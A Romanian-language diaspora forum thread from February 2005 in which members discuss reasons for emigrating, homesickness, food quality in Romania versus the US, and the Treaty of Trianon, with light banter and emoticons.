rossa, in curand si tu treci la categoria "unguri", ca si mine, ca si altii smileys/smiley2.gif Toti care nu sunt de partea lui aconi, cu siguranta sunt impotriva lui. Fara sa fie inregimentat politic, aconi foloseste artileria grea, mai ceva decat VC Tudor si ai lui bravi aparatori ai patriei. smileys/smiley97.gif smileys/smiley96.gif smileys/smiley98.gif smileys/smiley99.gif

rossa
22.02.2005, 01:40
Daca va folosi artileria grea o sa ripostez cu bomba urat mirositoare ! Ce zici , am sanse de reusita ??smileys/smiley36.gif

sauzimdebine
22.02.2005, 01:42
Mare minune, tu nu vezi ca ei rezista la orice? Harsiti prin multe baietii astia, mai mult rele cei drept, dar harsiti ...

aconi
22.02.2005, 04:49
Habar nu am pe unde dracu
mi-am pus ochelarii asa ca n-am cum sa privesc peste 50-60 de ani .
Atunci o sa ma uit la concertul viermilor din cosciug (poate Da , poate
NU , poate altii mai repede) smileys/smiley36.gif

esti foate pragmatic si te admir.Mai sunt unii sunt si ei un rau necesar, care stiu sa "priveasca" in viitor.smileys/smiley37.gifaconi

22.02.2005, 06:00
Tot despre emigrare...

O intrebare esentiala e "ce ma face sa-mi fie dor de Romania?". Raspunsiri de genul "Daca as puteaavea un trai decent, m-as intoarce imediat" reduc problema la argumente economice si nu rezolva nimic. Doar fiind onesti cu noi insine si intelegand adevaratele cauze ale dorului de casa putem lua o decizie.

In putinele momente in care mi se face dor de romania, la ce ma gandesc de fapt? Am o familie mica, mama e in tara, mai vine prin america din cand in cand, iar dorul de mama nu e un motiv realist. Copii cresc si pleaca, e normal.

Prietenii din liceu si facultate? Sunt toti raspanditi prin toate colturile lumi - cele viabile -in special Europa de vest, canada si usa. Cantitativ am mai multi prieteni in america decat mi-au ramas in romania. Iar nu e un motiv suficient.

Modul de viata mai relaxat? - am auzit-o si pe asta - nu e adevarat, toti prietenii mei care au ramas acasa au firmele lor sau lucreaza la firme particulare, si lucreaza de dimineata pana noaptea. Chiar imi spuneau la ultima intanire "ce bine ca mai veniti voi astia din america din cand in cand, ca macar asa mai iesim si noi in lume la o distractie".

Oamenii in general? - In nici un caz. Romanii nu sunt mai compatibili cu mine decat alte popoare. Iar dupa ce te descurci in alta limba iti dai seama ca poti comunica la fel de bine cu oricine, depinde doar de tine. Americanii sunt chiar mai deschisi si prietenosi decat alte popoare (nu neaparat mai putin superficiali.)

Dupa toate astea mi-am dat seama ca de fapt mi se face dor de oexcursie prin muntii Apuseni, de un drum de tara printre dealuri cu capite de fan, de o gara prafuita din transilvania unde arzi gazul de pomana vreme de doua ore asteptand sa vina acceleratul, de anumite strazi din orasul meu natal si de piata sudului din berceni, cu pitorescul ei extrem, cu manele latratoare sitarabe carevand banane la bucata, revoltatoare si totusiatat deromaneasca!

Pot trai fara ele pentru ca stiu catot asami s-ar face dor si de america daca as pleca, asa cum imi e uneori dor de anumite aspecte din germania, unde am trait vreme de patru ani.

M-as intoarce pentru lucrurile de care mi-e dor? Nu, dar sunt niste amintiri minunate. Din fericire majoritatea dintre noi privim spre viitor, spre alte incercari si descoperiri, si tinem nostalgiile unde le este locul.

sorin
22.02.2005, 06:09
Realist si la subiect comentariul, fara aruncat noroaie nici inspre Romania nici inspre America asa cum s-a mai intamplat in trecut in alte discutii. As adauga faptul ca dorul de tara se poate vindeca mergand macar o data pe an in Ro si nu o data la 5 ani sau mai mult cum obisnuiesc unii.

Mai scrie-ne Fritz smileys/smiley1.gif

garfield
22.02.2005, 06:23
Daca ti-e chiar asa de dor de Romania este okay sa te duci in fiecare an, dar daca nu ai familie apropiata sa prieteni, atunci pentru ce sa mergi anual? Sa platesti la hotel pe litoral mai mult decat la un resort in Franta? Sa trebuiasca sa ascunzi totul de valuare ca se fura pe rupte?

Sunt atat de multe locuri frumoase de vizitat in toata lumea asta. Cei care locuiesc in USA cate locuri au vizitat aici in state? Dar cei din Europa, ati vazut toate tarile si orasele frumoase de acolo? smileys/smiley92.gif

22.02.2005, 06:38
Am inteles camulti din RO prefera sa mearga la ski in Austria iar pe litoral in Grecia,Turcia..etc..unde este mult mai ieftin si conditiile sint mai bune.smileys/smiley18.gif

tonita
22.02.2005, 06:38
Deci viitorul e negru, aconi ?!smileys/smiley5.gif

Nupun la indoiala faptul ca esti un [i]rom

22.02.2005, 06:40
Sunt atat de multe locuri frumoase de vizitat in toata lumea asta. Cei care locuiesc in USA cate locuri au vizitat aici in state? Dar cei din Europa, ati vazut toate tarile si orasele frumoase de acolo? smileys/smiley92.gif

Intr-adevar, la 15 zile de concediu pe an si $1000 biletul de avion, parca nu prea ma viziteaza dorul de casa. Si cum spuneai, stau si ma gandesc, sunt atat de multe alte locuri frumoase de vazut in lume si in america in special; dacamerg in vacantain romania in fiecare an parca "beats the purpose"... Multi emigreaza tocmai ca sa faca destui bani ca sa vada lumea dupa care isi petrec concediile tot in romania, hehe...

angela
22.02.2005, 06:41
Ati aflat cat costa carnea si toate celelalte in tara???? Daca da
atunci o sa va mai treaca din dor. Nu e de trait acolo cel putin nu
acum. Situatia nu este cea mai roza si viata e grea.

22.02.2005, 06:50
Ati aflat cat costa carnea si toate celelalte in tara???? Daca da atunci o sa va mai treaca din dor. Nu e de trait acolo cel putin nu acum. Situatia nu este cea mai roza si viata e grea.

Angela, de acord cu tine, dar...

Multi dintre cei plecati gandesc: "daca m-ar plati acolo cu salariul de aici n-as ezita o clipa..."

Da, in romaniamulte sunt chiar mai scumpe decat in america. Ultima mea vizita a fost in octombrie 2004 si am ramas surprins ca la Billa am cheltuit echivalentul a $20pe mancare, si nu pentru cine stie ce produse de lux.

Dar economic vorbind problemele se pot rezolva. O parte din cei emigrati au job-skills care sunt la mare cautare si in romania, si platesc bine.Majoritatea avem o experienta de munca inusa (in orice domeniu ar fi) care ne-ar ajuta sa ne gasim joburi bine platite in romania.

angela
22.02.2005, 06:54
Ai si tu dreptate dar problema e ca salariile au ramas cam aceleasi si de aici porneste toate durereasmileys/smiley9.gif.
Am sa ma duc si eu in tara in luna iulie si am sa stau 6 luni. Am sa va
spun atunci cat mai multe deoarece voi fii la fata loculuismileys/smiley2.gif

22.02.2005, 06:56
Da, in romaniamulte sunt chiar mai scumpe decat in america. Ultima mea vizita a fost in octombrie 2004 si am ramas surprins ca la Billa am cheltuit echivalentul a $20pe mancare, si nu pentru cine stie ce produse de lux.

dar calitatea produselor este mai buna cel putin la mincare ,multe sint import Europa care si aici sint scumpe smileys/smiley9.gif

sint de acord cu chestia ca ne ajuta experienta de aici in a ne gasii acolo un loc mai bun de munca darnu uitatica acolo nu te mai angajeaza daca ai depasit 30 ani asa de usorsmileys/smiley18.gif

22.02.2005, 12:14
dar calitatea produselor este mai buna cel putin la mincare ,multe sint import Europa care si aici sint scumpe smileys/smiley9.gif

Vrei sa spui, calitatea produselor alimentare in romania este mai buna? Nu cred ca e adevarat in general, dar intr-un anume caz ai dreptate:legumelecumarate de la piata in romania sunt mai gustoase decatcele din grocery store-urile de aici. Asta pentru ca taranii nostrii inca nu-si permit sa faca productie industriala, sa culeaga inainte de vreme si sa le coaca in instalatii speciale. Bineinteles, aici poti sa cumper de la organics, dar platesti, deh...

sorin
22.02.2005, 13:31
Comparand doar legumele nu mi se paresuficient. Cred ca diferenta esentiala si care trebuie luata mai mult in seama este intre carnea cu hormoni din State si ceamult mai sanatoasa din Ro. Eu merg in fiecare an in Ro si pot sa spun fara retineri ca o friptura in Romania este mult mai buna decat una de aici smileys/smiley2.gif

22.02.2005, 21:11
Sorine, gusturile nu se schimba oricum prin argumente, deci n-am sa incerc sa demonstrez ca fripturile din romania sunt la fel de bune ca si cele din america; calitatea depinde de restaurant sau de cum gateste mama...

Dar un lucru vreau sa precizez: stiintific nu exista nici o dovada cum ca carnea, sau orice alte alimente produse prin inginerie genetica sunt nesanatoase sau nocive organismului uman. Astra nu inseamna ca nu s-ar putea sa fie asa, doar ca la momentul de fata dupa aproximativ 15 ani de inginerie genetica intensiva in industria alimentara, nu exista inca efecte adverse vizibile.

Oricum, adversarii (in genere EU) si sustinatorii (us. si canada) acestor metode continua sa se certe pe tema asta...

rossa
23.02.2005, 00:29
fritz, ca tot vorbeai de fripturi , ce ti-as mai pune avatarul la tava ....smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

sauzimdebine
23.02.2005, 01:04
eu aduc varza ...
dar hai sa nu facem varza din subiect ... ca acum apar cei cu pietrele ...

23.02.2005, 02:08
Vrei sa spui, calitatea produselor alimentare in romania este mai buna?

Nu marefeream neaparat la gust ci in special la faptul ca sint mai sanatoase adica de exemplu carenea este fara hormoni sau antibiotice.smileys/smiley5.gif

Nu ca mincareaar fi un motiv de a te intoarce in tara dar totusiesteun lucru important.

aconi
23.02.2005, 02:41
Mare minune, tu nu vezi ca ei rezista la orice?
Harsiti prin multe baietii astia, mai mult rele cei drept, dar harsiti
...

sa nu razi de mine. Dar,nu inteleg ce-i aceea HARSITI?smileys/smiley80.gif

aconi
23.02.2005, 03:21
[QUOTE=toni42]

Deci viitorul e negru, aconi ?!smileys/smiley5.gif

Nupun la indoiala faptul ca esti un [i]rom

sorin
23.02.2005, 03:34
Aconi, ti-am corectat eu, dar de acum incolo scrie comentariul tau sub [/QUOTE], altfel nu se mai stie care-i comentariul tau smileys/smiley2.gif

tonita
23.02.2005, 05:34
<TABLE cellSpacing=1 cellPadding=3 width="100%"><T>
<T>
<TR>
<TD class=text vAlign=top background="" bgColor=#f4f4fb>

aconi, desi suntem putin off topic iti raspund aici ca la politica nu ma pricep si nu ma bag

...Organizatii etnice...?In Germany exista asa ceva?

Da, de exemplu SSW - O uniune de alegatori de originedaneza care cu 4% din voturile de duminica 20.02 vorasigura majoritatea necesara pentru conducerea Landului Schleswig-Holsteinputerii actualesauopozitiei. Ram

23.02.2005, 06:37
fritz, ca tot vorbeai de fripturi , ce ti-as mai pune avatarul la tava ....smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

Pekin duck is the best, pus la cuptor vreo cateva ore.

Dar ratoiul asta e cam batraior saracu', se ard morcovii pana se fragezeste carnea...

23.02.2005, 07:20
[QUOTE=toni42]

... ce parere ai despre filmul Trianon?

Nu l-am vazut, nu pot sa-mi dau cu parerea, am auzit doar ca ar fi "ur

garfield
23.02.2005, 07:53
Am gasit un articol neutru despre tratatul de la Trianon pentru cei care nu cunosc ce este:
[QUOTE]Trianon, Treaty of, 1920, agreement following World War I in which the Allies disposed of Hungarian territories. The internal chaos in Hungary (http://www.infoplease.com/ce6/world/A0824544.html) that followed the dissolution (1918) of the Austro-Hungarian Monarchy delayed the signing of a peace treaty with the Allies of World War I (excluding the United States and Russia, who did not sign it). The treaty, signed on June 4, 1920, at the Grand Trianon Palace at Versailles, France, reduced the size and population of Hungary by about two thirds, divesting it of virtually all areas that were not purely Magyar. Romania received Transylvania, part of the adjoining plain, and part of the Banat, including Timisoara. Czechoslovakia was confirmed in possession of Slovakia and Ruthenia. Yugoslavia (then the Kingdom of the Serbs, Croats, and Slovenes) obtained Croatia, Slavonia, and the western section of the Banat. Austria was awarded the Burgenland, but the city of Sopron and its vicinity were returned to Hungary after a plebiscite (1921). Thus, Hungary was deprived of access to the sea and of some of its most valuable natural resources. The military establishment of the country was reduced to an army of 35,000. The Hungarian delegation signed the treaty under protest. Hungarian agitation for revision began immediately and was supported by the majority of the more than 3 million Magyars transferred to Romania, Yugoslavia, and Czechoslovakia. Although Hungary recovered part of its lost territories in 1939

Cali
23.02.2005, 08:21
Simplu si la obiect: daca as avea un venit de 2000 euro/luna ,miine as pleca! Restul case ,casini deja am in Ro.....asa ca lucrez la a deveni cetatean american *in 2 luni) ,copil cetatean american am (deci nascut aici) deci am cistigat si libertatea de miscare. Cam in 2 ani ne intoarcem ! Yupii!

23.02.2005, 08:35
Sa sti ca asa zic multi si dupa ce isi iau cetatenia numai pleaca,de ce oare?!smileys/smiley18.gifprobabil ca se debusoleaza pe parcurs

Cali
23.02.2005, 09:01
Nu este cazul nostru.....

23.02.2005, 09:02
De ce emigram?

Cum spuneam unii se intorc, altii nu. Dar totusi de ce am plecat? Iata cateva motive din multitudinea de raspunsuri posibile:

1) Majoritatea "stranierilor" sunt un fel de refugiati economici. Cum spunea Cali mai inainte, asa judeca multa lume: "salariul de aici cu viata de acasaar fi o combinatie perfecta". Banii inca sunt o problema in romania, calculele pe care trebuie sa le faci ca sa-ti ramana destui la sfarsitul lunii ca sa poti cumpara paine te aduc la disperare. Calculele astea te imping de obicei spre Canada, singua tara care inca accepta imigrare directa, ne-sponsorizata, sau spre loteria vizelor usa. Ori poate spre Italia, unde cred ca mai degraba se face naveta decat se emigreaza smileys/smiley2.gif.

2) Frustrarea acuta fata de incremenirea deplina a sistemului in romania: pdsr, pntcd, dupa care iar pdsr rebotezat psd au condus pe rand tara si parca nimic nu se misca. Normal ca vroiai sa-ti iei lumea-n cap... Cand am venit in romania la intalnirea de 10 ani de la terminarea liceului toata lumea nu vorbea decat despre pleacare, undeva, oriunde. Acum s-au mai linistit, parca lumea a capatat ceva speranta.

3) Cariera profesionala are un rol insemnat, in special pentu cei care au studiat la facultati tehnice, calculatoare si electronica mai ales. Cu zece ani in urma, un absolvent de Calculatoare nu prea avea mari perspective in Romania, tocmai incepeau lucrurile sa se miste, greu de tot, iar nevoia de specialisti in vestdevenise acuta. Foarte usor, multi dintre noi am ajuns pe calea asta in Germania oristatele unite, unii direct la firme, altii la doctorate.

4) Nevoia de aventura, de a descoperi alte tari si de a trai in alte culturi, desi un motiv de emigrate relativ mai putin intalnit, si-a facut simtita chemarea in cazul unora dintre noi. Imi aduc aminte cu cata aviditate incercam sa asimilez tot ce se putea despre germania sau america din diferite carti cu poze, cum visam sa traiesc in Munchen sau Seattle desi habar n-aveam cum e viata pe acolo...

Din experienta mea, cei emigrati in principal din motivele 1) sau 2) sunt si cei care doresc cel mai adesea sa se intoarca. Cei din categoria 3) de obicei odataplacati, sunt dusi pe bune, iar 4) s-ar oputea sa pribegeasca pana obosesc...

Cali
23.02.2005, 09:32
Fritz puctat decisiv!

Exact eu ma intorc pentru ca fac parte sa zicem din prima categorie...sa zicem pentru ca eu am scris o aplicatie la loteria vizelor si ca sa vezi am si cistigat....si atunci ne-am intrebat, de ce sa nu mergem , vedem o alta lume, cultura , civilizatie,bla, bla , bla, stringem si niste bani care nu i-am fii stins in 3 vieti din munca cinstita in Ro, devenim si cetateni americani in 5 ani.....cum naiba sa nu pleci? Asa ca noi am venit pt 5 ani, dar din calcule rezulta ca pentru indeplinirea planului mai trebuie sa stam aici inca 2....Si nu care cumva sa credeti ca nu ne-am adaptat...ca sintemm pe ajutoare sociale (nici nu ai voie daca cistigi loteria), deci sintem deja in patura mijlocie si cu asta am spus tot. Precizarea se vroia facuta pentru a nu se crede ca nu ne-am "descurcat " pe aici si o taiem acasa cu codita intre picioare...hi,hi,hi

V-am dat ex. personal, celelate situatii nu le pot judeca...dar stiu ca mai am putin si vin ACASA!!!

garfield
23.02.2005, 10:42
fritz, ai uitat categoria celor care au plecat pe motive politice din romania. Cei care au fost torturati si chinuiti si au plecat sa poata avea libertate si o viata normala. Sunt care nu au mai suportat se li se bage sh** pe gat cu lopata, si nu au vrut sa se faca membrii de partid si sa devina parte din rahatul comunist. Nu sunt chiar toti aici numai sa-si umple buzunarele, si apoi sa dea fuga inapoi. Pentru cei care au castigat loteria si vin doar pentru bani, eu la plecare le-asi lua dreptul de reintors si as da locul lor la altii care poate intradevar vor sa fie aici.

23.02.2005, 11:12
fritz, ai uitat categoria celor care au plecat pe motive politice din romania.

Hehe, garfield, ei dreptate. Fara sa vreau m-am referit numai la cei plecati dupa revolutie. Mai exista si cei care au cerut azil politic in occident dupa 1989, dar argumentele nu prea stateau in picioare.

sauzimdebine
23.02.2005, 14:59
Orice incercare de categorisire a motivelor emigrarii va fi incompleta, pe considerentul ca fiecare caz in parte este unic. Se gasesc elemente comune care pot defini o parte sau alta ca apartinand unei categorii, fara a putea spune ca definesc intru totul totalitatea cazurilor grupate astfel, oricat de mult si aricat de bine ar reusi aceasta cautare a unui fond comun.

Cat priveste pe cei care au plecat doar pentru a avea de unde se intoarce, cu bani mai multi sau mai putini ... nu-i pot numi emigranti. Emigrarea implica dezradacinare, nu mutarea sezoniera cu cortul, doar pentru ca pentru o perioada de timp, undeva, oriunde, se gaseste iarba mai verde decat in locul de bastina.
Fara sa neg importanta partii materiale a vietii, nu pot sa nu remarc ca pe langa bani si posibilitatile aduse de detinerea lor, cat mai multi bani de preferinta, exista si celelalte aspecte ale vietii unei persoane, care, uneori si nu de putine ori, atarna cel putin la fel de greu in balanta. Bani se fac oriunde in lume. Pentru unii dintre noi depinde si cum se fac.

aconi
23.02.2005, 19:25
Aconi, ti-am corectat eu, dar de acum incolo scrie comentariul tau sub , altfel nu se mai stie care-i comentariul tau smileys/smiley2.gif[/QUOTE]

smileys/smiley32.gif Mulumesc.Voi incerca sa ma conformez. a fost putin problematic deoarece sunt autodidact in ale internetului.Cu bine,smileys/smiley2.gif s-auzim de... bine, aconi.

smileys/smiley17.gifAr fi fain duelul iconitelor.Dar nu
prea cunosc l engleza( poate sunt si alti forumisti din tara) care
doresc sa tina legatura cu voi si prin aceasta modalitate
distractiva.Ar fi problema sa le traduci semnificatia si in l.
romana?aconi

aconi
24.02.2005, 00:58
[QUOTE=garfield]

Am gasit un articol neutru despre tratatul de la Trianon pentru cei care nu cunosc ce este:
[QUOTE]</span>Trianon, Treaty of,</span> 1920, agreement following World War I in which the Allies disposed of Hungarian territories. The internal chaos in Hungary (http://www.infoplease.com/ce6/world/A0824544.html)
that followed the dissolution (1918) of the Austro-Hungarian Monarchy
delayed the signing of a peace treaty with the Allies of World War I
(excluding the United States and Russia, who did not sign it). The
treaty, signed on June 4, 1920, at the Grand Trianon Palace at
Versailles, France, reduced the size and population of Hungary by about
two thirds, divesting it of virtually all areas that were not purely
Magyar. Romania received Transylvania, part of the adjoining plain, and
part of the Banat, including Timisoara. Czechoslovakia was confirmed in
possession of Slovakia and Ruthenia. Yugoslavia (then the Kingdom of
the Serbs, Croats, and Slovenes) obtained Croatia, Slavonia, and the
western section of the Banat. Austria was awarded the Burgenland, but
the city of Sopron and its vicinity were returned to Hungary after a
plebiscite (1921). Thus, Hungary was deprived of access to the sea and
of some of its most valuable natural resources. The military
establishment of the country was reduced to an army of 35,000. The
Hungarian delegation signed the treaty under protest. Hungarian
agitation for revision began immediately and was supported by the
majority of the more than 3 million Magyars transferred to Romania,
Yugoslavia, and Czechoslovakia. Although Hungary recovered part of its
lost territories in 1939

24.02.2005, 01:27
Comparand doar legumele nu mi se paresuficient. Cred ca diferenta esentiala si care trebuie luata mai mult in seama este intre carnea cu hormoni din State si ceamult mai sanatoasa din Ro. Eu merg in fiecare an in Ro si pot sa spun fara retineri ca o friptura in Romania este mult mai buna decat una de aici smileys/smiley2.gif

Sorin, ar fi interesant de stiut cu cecompari tu fripurile din Ro.Am avut o conversatie cu un amic inapoiatrecent din taracare era de aceiasi opinie, ca alimetelesunt de o calitate superioara in Ro. "pai ma frate am fost la Athene Palace si am mancat o friptura da mi sa topit in gura nu ca asta da la Sizzler dama doare falcile mestacand,"a spus amicul. Si probabil ca are dreptate, la restaurantele de lux din tara unde probabil ca numai expartriatii si diplomatii straini isi pot permite, semananca mai bine ca la restaurantele de $5 in US. Interesant ar fi sa facem comparatia intre restaurantele de lux din tara cu cele de luxdin US, dintre magazinele de lux de aici si cele din tara. Stie cineva cum se compara un steak house din Ro cu de exempluMorton's of Chicago, The Capital Grille, The Palm, Ruth's Chris, sau Stoney River?smileys/smiley5.gif

aconi
24.02.2005, 03:11
[QUOTE=toni42]<t>
<t>
</t></t><table cellpadding="3" cellspacing="1" width="100%"><t><tr>
<td class="text" background="" bgcolor="#f4f4fb" valign="top">

aconi, desi suntem putin off topic iti raspund aici ca la politica nu ma pricep si nu ma bag

...Organizatii etnice...?In Germany exista asa ceva?

Da, de exemplu SSW - O uniune de alegatori de originedaneza
care cu 4% din voturile de duminica 20.02 vorasigura
majoritatea necesara pentru conducerea Landului
Schleswig-Holsteinputerii actualesauopozitiei.
Ram

aconi
24.02.2005, 03:23
[QUOTE=fritz]

[QUOTE=toni42]

... ce parere ai despre filmul Trianon?

Nu l-am vazut, nu pot sa-mi dau cu parerea, am auzit doar ca ar fi "ur

24.02.2005, 06:12
Detalii despre filmul Trianon gasesti www.trianon.hu
Cat despre sentimentele acute despre care vorbesti, subiectul devine chiar fascinant daca mergem la evenimentele din 1848-1849.
Trebuie sa analizam si cele petrecute intre anii 1940-1944, perioada in care potrivit Diktatului de la Viena Ardealul a fost sub ocupatie maghiara.
Dupa toate aceste vine filmul cu pricina care pune sub semnul intrebarii Tratatul de la Trianon.Curat....murdar. aconismileys/smiley36.gif

Bine mai, dar www.trianon.hu (http://www.trian&#111;n.hu) e doar in ungureste deocamdata.

Fara sa vreau sa pornesc un flame-war pe thread-ul asta, mie mi-e destul de limpede, ca daca frontiera romano-ungarae asa cum arata acum (cea stabilita la Trianon in 1920) se datoreaza mai mult ambitiilor personale ale lui Bratianu decat unei partitii riguroase pe linii etnice (care oricum erau de greu de trasat). El ar fi vrut sa fie frontera pe Tisa, dar l-au trimis francezii la plimbare, si au acteptat doar ca Oradea, Aradul si Satu Mare sa fieincluse in romania.

In ciudaconcertului european al pacii siprieteniei in plina desfasurare,tot nu imi vine sa cred ca maghiarii se vor putea obisnui vreodata cu gandul ca au pierdut doua trimi din teritoriu (si intr-un fel chiar din vina lor; daca ar fi negociat la timp, ar fi pierdut mai putin de jumatate). Francezii au fost obsedati vreme de aproape cincizeci de ani de pierderea a doua provincii amarate, Alsacia si Lorena. Asta e soarta invinsilor... Punandu-ma in pielea lor, cred ca si eu as simti un junghi din cand in cand.

sorin
24.02.2005, 06:46
Sorin, ar fi interesant de stiut cu cecompari tu fripurile din Ro.Am avut o conversatie cu un amic inapoiatrecent din taracare era de aceiasi opinie, ca alimetelesunt de o calitate superioara in Ro.

Poate trebuia sa precizez ca ma refeream la carnea cumparata de la magazin, nu la comparatii intre restaurante. Puii din State de exemplu sunt uriasi in comparatie cu cei din Ro, insa nu si la fel denaturali, plus faptul ca oricand poti cumpara o gaina de undeva la tara cara n-a vazut in viata ei hormonismileys/smiley2.gif

Carnea consumata in State poate fi o explicatie a numarului mare de obezi si supraponderali de pe aici.

garfield
24.02.2005, 06:58
Poate ca gainile din Romania sunt mai sanatoase si fara hormoni sau antibiotice, dar cele americane arata mai binesmileys/smiley2.gif

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Assorted/hot_turkey.jpg

24.02.2005, 07:04
Frumusica si spatoasa!smileys/smiley36.gifsmileys/smiley2.gif

garfield
24.02.2005, 07:47
Daca vorbim de friptura din carne de vaca, sa nu uitam riscul asociat cu gasirea de mad cow disease in europa!

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Animals/madcow.jpg

24.02.2005, 07:54
smileys/smiley36.gifand mad people

http://www.redcoat.net/pics/cow.gif

garfield
24.02.2005, 08:05
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifasta cred ca a mancat carne infectata smileys/smiley36.gif

Ai vazut filmul 'Top Secret' ? nu e recomandat sa porti costum de vaca in preajma boului smileys/smiley36.gifsmileys/smiley36.gif

24.02.2005, 08:14
smileys/smiley36.gifsmileys/smiley36.gifda a fost in Europa si a mincat carne infectata si cind sa intors in US se da la vacile americane ca un bousmileys/smiley36.gif

Da am vazut filmulsmileys/smiley4.gif

garfield
24.02.2005, 09:49
Uite ce am facut noi si din topicul de reintors in tarasmileys/smiley36.gif

aconi
24.02.2005, 19:24
Uite ce am facut noi si din topicul de reintors in tarasmileys/smiley36.gif

Lasa garfield! Nu e rau cate odata sa ne"prostim"
este o supapa de refulare a gandurilor,a semnelor de intrebare pertru
trecut, prezent dar mai ales pentru cele ale viitorului.smileys/smiley2.gifIsi revin ei.aconi

aconi
25.02.2005, 02:55
smileys/smiley36.gifsmileys/smiley36.gifda a fost in Europa si a mincat carne infectata si cind sa intors in US se da la vacile americane ca un bousmileys/smiley36.gif

Da am vazut filmulsmileys/smiley4.gif

macar daca s-ar"da" ca un taursmileys/smiley8.gifaconi

aconi
25.02.2005, 03:09
Frumusica si spatoasa!smileys/smiley36.gifsmileys/smiley2.gif

Iti plac si....spatosii?

25.02.2005, 04:38
Da dar numai spatosii cu obrazul fin nu ciobanii!smileys/smiley2.gif

garfield
25.02.2005, 05:03
Da, melina dar daca ciobanul e tinar, si frumos (poate chiar sexy) si se da cu moisturizer pe piele, ajuta? smileys/smiley36.gif

garfield
25.02.2005, 05:20
http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/blinkhead.gif

25.02.2005, 05:28
Garfield degeaba te uiti asa de gales ,ciobanul tot cioban ramine!smileys/smiley36.gif

garfield
25.02.2005, 05:35
OKAY, poate e ciobanul unpic necioplit, dar nu ajuta deloc daca are pielea moale? Dar daca e cute? Funny?? Did I mention sexy???

OK, you win. Lasam ciobanii la oi si trecem la motani. smileys/smiley36.gifNo puti sa zici numic de ei sper. smileys/smiley2.gif

angela
25.02.2005, 05:38
Mai ales de motanelul tausmileys/smiley2.gifsmileys/smiley36.gif. Tare frumos mai este, atat de dulce iti vine sa il pupi toata ziuasmileys/smiley2.gif

aconi
25.02.2005, 05:44
Da dar numai spatosii cu obrazul fin nu ciobanii!smileys/smiley2.gif

Sunt si ciobanite,finute si ...dragute.Oare numai ciobanii le doresc?smileys/smiley17.gif

garfield
25.02.2005, 05:48
http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/Love_It_is_Not_Pretty.jpg

25.02.2005, 06:07
OK, you win. Lasam ciobanii la oi si trecem la motani. smileys/smiley36.gifNo puti sa zici numic de ei sper. smileys/smiley2.gif

Motanii sint OK numai ca trebuie sa le tai din cind in cindghiarele ,ca sa nu ma zgiriesmileys/smiley2.gif

garfield
25.02.2005, 06:39
Hei hei, astazi vrei sa tai ghiarele, maine o sa vrei sa tai ..... altceva smileys/smiley36.gifTine-ti forfecuta in sertar smileys/smiley36.gif

25.02.2005, 06:46
Ai incredere ca stiu ce trebuie taiat si ce trebuie pastrat!smileys/smiley36.gif

aconi
25.02.2005, 06:54
Aconi , iar ai gresit "botoanele" ?

Ce sa-i faci rossa, asa-i, graba strica treaba;dar...nu-i bai pana la
urma tot se intelege;important este ca am ajuns si noi cei de
aici la "botoane"

si...mama, mama ce mai "botonam", ce ne mai plimbam in jurul Tesmileys/smiley2.gifrrei de par-ca am juca Hora uniriismileys/smiley36.gifaconi

tonita
25.02.2005, 21:36
aconi, pentru c

aconi
26.02.2005, 08:15
[QUOTE=toni42]aconi, pentru c

garfield
26.02.2005, 08:35
...In orice caz, voi cei care ati plecat ca sa va "realizati" sa aveti o viata economica ce sa va permita, cum se zice, un trai decent sa stiti ca asa ceva nu veti gasi nici odata...

aconi, asta suna ca vulpea care zice ca strugurii pe care nu-i ajunge, nu-i vrea ca-s acrii oricum.

Cum poti tu sa faci astfel de statement? Este complet incorect. Daca tie-ti place unde esti, este perfect. Stai acolo. Nu trebuie totusi sa critici sau sa descurajezi pe cei cu ambitii si care sunt dispusi sa face orice efort necesar sa-si creeze o viata mai buna.

tonita
26.02.2005, 08:47
he,he, foaaarte complexa ...smileys/smiley2.gif

Totusi gasesc intelept ceea ce spui tu, cu iglul. Cu alte cuvinte desteptu se simte bine si in iad iar prostu nu e fericit nici in rai ! Depinde de...felul cum g

garfield
26.02.2005, 09:15
Treaba cu igloo e corecta dar cred ca nu foarte relevanta. Sunt convins ca bastinasii din Amazon sunt foarte fericiti, si la fel si eskimo din Alaska. Da, poti fi fericit(a) uriunde, dar asta nu inseamna ca esti, si nu inseamna sa nu incercam sa ne fie mai bine.

Putemnumi fericiti pecei care locuiesc in zone unde nu au ce sa dea de mancare la copii? Sau apa curata? Sau haine? Sau caldura? Dar cei in tari unde esti arestat si torturat pentru ca ai vorbit inpotriva guvernului?

Ce e asa de rau sa vrei tot timpul o slujba mai buna, o masina mai buna si o casa mai mare? Ce e rau sa vrei sa dai la copii tai conditii si posibilitati mai bune decat ai avut tu? De acord, poti fi fericit si fara multe lucruri (trei sferturidin populatia de pe pamant nu au folosit niciodata telefon) dar daca folosim aceasta logica ar trebui toti sa alergam prin jungla in pielea goala si sa mancam doar alune si fructe. smileys/smiley5.gif

tonita
26.02.2005, 10:22
100 % de acord Garfield. De aia l-am Intrebat pe aconi "haw much ?" . In ciuda sentimentelor patriotice tot pielea ti-e mai aproape dec

27.02.2005, 19:38
Stiu oameni plecati din Romania pe care nu-i mai multumea fostul RFG voiau in State ca e mai bine.Cautam fericirea: DA! dar unde e? Am mai zis, este fericire si in iglu dupacum este nefericire si in palatele imparatesti.smileys/smiley25.gifaconi

Continuand argumentul, nu e o mare diferenta intre exemplul tau si cazul unuia care pleaca de la Apahida la Cluj, dupa care se muta la Bacau, ca e mai bine. Tot un fel de imigrare-i si asta. Exact asa cum la tine in tara s-ar putea sa-ti gasesti de lucru doar la Bucuresti si sa-ti dai seama dupa o vreme ca urasti capitala si vrei sa te muti la Timisoara, tot asa, unii dintre noi (si eu fac parte din categoria mentionata de tine) am plecat intai in Germania, iar de acolo in America.

De ce? In cautarea fericirii, evident, si in mare parte poate din neadaptare la gazda noastra europeana. Cum spunea un prieten de-al meu cu care-mi faceam veacul in Munchen pe vremuri, "ca roman in Germania nu vietuiesti, ci supravietuiesti". Nu se poate generaliza, dar cert e ca nu orice tara de adoptie se potriveste oricui. Drept urmare, cautam, pana gasim, daca gasim...

rossa
28.02.2005, 00:09
